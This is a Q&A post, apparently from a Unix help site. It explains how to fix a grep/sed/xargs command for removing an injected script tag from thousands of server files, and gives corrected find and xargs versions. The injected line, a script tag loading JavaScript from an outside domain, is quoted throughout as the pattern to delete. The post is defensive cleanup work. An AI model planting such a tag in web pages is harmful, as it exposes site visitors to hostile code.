
We are trying to remove a single line of injected code from thousands of files on our server using grep and sed:

<script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'></script>

Based on our search, it seems the code was injected only near the beginning of each file.

The command we tested is:

grep -r -H "collectfasttracks" * | xargs sed -i '/<script type/=/'text/javascript/' src/=/'https/:\//dest/.collectfasttracks/.com\/y/.js/'/>/<\/script/>/d'' '{} \;

But it failed with the error:

sed: -e expression #1, char 16: extra characters after command

Perhaps we missed something in the sed command.



More than one issue here.

  1. Every single-quote (') in your command is seen by the shell and removed during the quote removal phase. See the output of

    printf '%s\n' '/<script type/=/'text/javascript/' src/=/'https/:\//dest/.collectfasttracks/.com\/y/.js/'/>/<\/script/>/d'' '{}
    

    There are no single-quotes in the output, which means no single-quote got to printf. It seems you tried to escape some single-quotes with a slash (/). Problems:

    • the right character to escape anything is backslash (\);
    • a single-quoted backslash escapes nothing anyway, because there is no escaping inside single quotes; the shell treats any single-quoted string literally.

    To make a single-quote character survive the quote removal phase you need to double-quote it. If you need to single-quote other parts of the string, proceed like this:

    printf '%s\n' 'single-quoted part'"'"'single-quoted as well'"'"'and again single-quoted'
    

    Here printf is just to show which quotes survive and get to the command. In practice you will use sed, xargs or whatever.

    If you can afford double-quoting the entire string, it's a lot more readable:

    printf '%s\n' "double-quoted part'double-quoted as well'and again double-quoted"
    

    Note double-quoted as well is double-quoted despite the neighboring single-quotes.

    In your case I think you can double-quote the entire string. In general, remember that a shell parsing a double-quoted string treats backquote (`), dollar sign ($) and backslash (\) specially.
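    A minimal sketch of that special treatment inside double quotes (the strings here are only illustrative):

```shell
# Inside double quotes, $ and ` are still expanded; \ can escape them.
printf '%s\n' "home is $HOME"       # $HOME is expanded by the shell
printf '%s\n' "literal \$HOME"      # \$ produces a literal dollar sign
printf '%s\n' "a single quote: '"   # ' needs no escaping in double quotes
```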

  2. sed works with regular expressions and you seem aware you need to escape some characters (e.g. .) to make the tool treat them literally. But again you mostly used /, which has nothing to do with escaping; you used \ surprisingly rarely.

    Note the previous point was about escaping in the context of the shell; now we're talking about escaping in sed. These are two different issues. If you decide to double-quote the entire string then remember sometimes \ is special to the shell in the first place. Compare this question. My answer there explains how both the shell and echo can treat \ specially. In your case there's the shell and sed but in general the problem is similar because sed like echo can treat \ specially.
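    A small sketch of the two layers, using a hypothetical demo file (GNU sed assumed):

```shell
# Two layers of escaping: first the shell, then sed.
printf 'a.b\naxb\n' > demo.txt
# Single-quoted: the shell passes \. through untouched; sed matches a literal dot.
sed -n '/a\.b/p' demo.txt    # prints only: a.b
# Double-quoted: \. also survives here, because in double quotes \ is special
# only before $, `, ", \ or a newline -- but be careful in general.
sed -n "/a\.b/p" demo.txt    # prints only: a.b
rm demo.txt
```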

  3. It seems your general idea was to use a /pattern/ d script for sed. If pattern contains slashes then you need to escape them. Not only did you fail to escape them, you introduced new slashes while trying to "escape" other characters. In effect the actual pattern was just <script type and the following = was taken as the command. The tool complained about what follows =.

    Your pattern contains slashes. To avoid the need for escaping them you can use another character while specifying the address. Compare this answer. E.g. the address specification can be like this:

    \@pattern@
    

    Now you don't need to escape slashes in pattern (but you need to escape @ if any).
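    For instance, deleting a line containing a URL from a hypothetical demo file, with @ as the delimiter (GNU sed -i assumed):

```shell
printf '%s\n' 'keep me' 'https://example.com/y.js' > demo.txt
# \@pattern@ d deletes matching lines; slashes in the pattern stay unescaped.
sed -i '\@https://example\.com/y\.js@d' demo.txt
cat demo.txt    # prints: keep me
rm demo.txt
```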

  4. {} is concatenated with the preceding string. The printf in my first point shows this. I guess this was not your intention.

  5. In your code {} is just literal {}. It would be different if you used xargs -I{} … or xargs -i … but you didn't. The -i after sed is not an option to xargs.
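    A quick demonstration of the difference (echo stands in for sed here):

```shell
# Without -I, {} is just another literal argument; input items are appended:
printf '%s\n' a b | xargs echo '{}'          # prints: {} a b
# With -I{}, every occurrence of {} is replaced by one input line,
# and xargs runs one command per line (prints: got a, then: got b):
printf '%s\n' a b | xargs -I{} echo 'got {}'
```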

  6. \; (or maybe even {} \;) seems to be taken from the syntax of find … -exec … \;. If your sed didn't throw an error, it would treat ; as the name of a file to operate on.

  7. grep -r -H … prints paths (filenames) and matching lines. You want grep -r -l … to get paths only.
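    Compare the two on a hypothetical directory:

```shell
mkdir demo70 && cd demo70
printf 'needle here\n' > f.txt
grep -r -H needle .    # prints path and matching line: ./f.txt:needle here
grep -r -l needle .    # prints the path only: ./f.txt
cd .. && rm -r demo70
```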

  8. * is expanded by the shell, so it may trigger an "argument list too long" error. You didn't get the error, so it's not an issue in your case. In general it can be, so using . instead of * may be a good idea. Differences:

    • Expansion of * omits dot files; traversal of . does not.
    • Expansion of * may pass a symlink as a command line argument to grep. By default grep -r skips symlinks unless they are provided explicitly in the command line.
  9. If you want to use * anyway, consider ./* instead. This is important in case * expands to something that looks like an option. Or use --.
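    A sketch of why this matters, with a deliberately option-like filename in a hypothetical directory:

```shell
mkdir demo76 && cd demo76
printf 'pattern\n' > ./-r     # a filename that looks like an option
# grep -l pattern *           # bad: * expands to -r, which grep takes as an option
grep -l pattern ./*           # safe: ./-r cannot be mistaken for an option
grep -l pattern -- *          # also safe: -- ends option parsing
cd .. && rm -r demo76
```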

  10. If any filename contains a newline (in general filenames can), piping such a string to a command that expects filenames as lines will make the command fail or misbehave. To avoid this you want to pass names as null-terminated strings, provided the tools you use support such a mode of operation. Your xargs may support -0 and your grep may support -z, but it won't help because -z doesn't affect the output of grep -l (at least this is the case with GNU grep in my Kubuntu; and it's not the only problem, but it's enough). Instead of piping paths to xargs, sometimes it's better to use find … -exec ….

  11. xargs interprets quotes and backslashes, unless you use -0 (if supported) or -d (if supported). Paths in general may include quotes and/or backslashes. For this reason alone you do want to use -0 even if newlines are not an issue. As stated above, grep -l doesn't generate null-terminated output, still you can use xargs -d '\n' (if -d is supported) to suppress interpretation of quotes and backslashes. This approach will not solve the problem with newlines in filenames but it will solve the problem of possible quotes or backslashes being interpreted by xargs.


Assuming you want * rather than . and there are no newlines in paths, this is the improved command:

grep -rl "collectfasttracks" ./* | xargs -d '\n' sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   "

If newlines can be an issue, a solution with find is the right one:

find ./* -type f -exec grep -q "collectfasttracks" {} \; -exec sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   " {} +

It works because -exec … \; is also a test. In this case exit status 0 from grep means the test succeeded.

Note the solution with xargs runs exactly one grep. Then xargs passes as many paths to a single sed as possible; more sed processes will be spawned if needed. This will perform very well.

The solution with find spawns one grep per file. Thanks to -exec … {} + (as opposed to -exec … \;) the number of sed processes will be as low as with xargs, but the massive number of greps will slow the entire solution down. On the other hand this solution is very portable and not flawed when it comes to filenames (it will work with any filenames).

If you're sure there are many files with matches and only few files without, dropping grep may be a good idea:

find ./* -type f -exec sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   " {} +

In this case sed will process a few files unnecessarily, yet it may be faster than spawning one grep per file for many files.

Warning: All the above solutions are able to pass multiple arguments (paths to files) to sed. This is good for performance but my tests (with GNU sed 4.4) indicate that a problem with one file (e.g. inability to create a temporary file) may make the tool abort and not process remaining files. To process files totally independently you need one sed per file. You achieve this by … | xargs -n 1 … sed … or find … -exec sed … {} \; (i.e. \; instead of +).
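A minimal sketch of the one-sed-per-file variant, on hypothetical demo files (GNU sed -i assumed):

```shell
printf 'x\n' > a.txt
printf 'x\n' > b.txt
# -n 1 makes xargs run a separate sed for each file, so a failure
# on one file cannot abort processing of the remaining files:
printf '%s\n' a.txt b.txt | xargs -n 1 sed -i '/x/d'
wc -c a.txt b.txt    # both files are now empty
rm a.txt b.txt
```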